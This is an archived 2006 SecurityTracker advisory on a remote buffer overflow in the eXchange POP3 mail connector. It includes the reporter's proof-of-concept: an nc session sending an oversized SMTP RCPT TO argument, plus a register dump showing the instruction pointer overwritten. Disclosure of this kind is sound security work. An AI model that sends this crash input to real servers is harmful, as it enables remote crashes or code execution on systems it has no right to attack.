Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (E-mail Server)  >   eXchange POP3 Vendors:   Kinesphere Corporation
eXchange POP3 Server Buffer Overflow in SMTP RCPT TO Command Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015580
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 3 2006
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.0 (build 050203)
Description:   securma massine from MorX Security Research Team reported a vulnerability in eXchange POP3. A remote user can execute arbitrary code on the target system.

A remote user can connect to the target SMTP service and send a specially crafted SMTP RCPT TO command parameter to trigger a buffer overflow. This can be exploited to execute arbitrary code on the target system.

A demonstration exploit command is provided:

rcpt to:<AAAAAA....("A"x4112)

The vendor was notified on January 16, 2006.

A demonstration exploit is available at:

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   The vendor has issued a fixed version (5.0 build 060125), available at:

Vendor URL: (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  Exchangepop3 v5 rcpt buffer overflow vulnerability

Author: securma massine <>
MorX Security Research Team
Product info :
EXchangepop3 is an email gateway (connector) that retrieves messages from Internet POP3 
email accounts and delivers them to Exchange Server.
Vulnerability Description:
eXchangepop3 is vulnerable to buffer overflow attack.
boundary errors in the handling of the RCPT TO (smtp) commands by sending a large 
buffer, allow remote users to set a new Instruction Pointer to execute arbitrary code 
and gain access on system.
C:\>nc 25
220 aaa ESMTP
mail  [enter]
250 OK
rcpt to:<AAAAAA....("A"x4112)
we have :
eax=00000001 ebx=007334e0 ecx=41414141 edx=7c91eb94 esi=00455a38 edi=0f010001
eip=41414141 esp=0221f750 ebp=00000001 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
41414141 ??               ???
Affected Software(s):
Exchangepop3 v 5.0 (build 050203)
Affected platform(s):
Exploit/Proof of Concept:
Solution :
The vendor has released a new build fixing the problem :
The build number is 060125.
14/01/2006  initial vendor contact
16/01/2006  vendor received details about the vulnerabilty
02/02/2006  vendor released the fixed build
this entire document is for eductional, testing and demonstrating purpose only.
Greets to undisputed and  all MorX members.


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC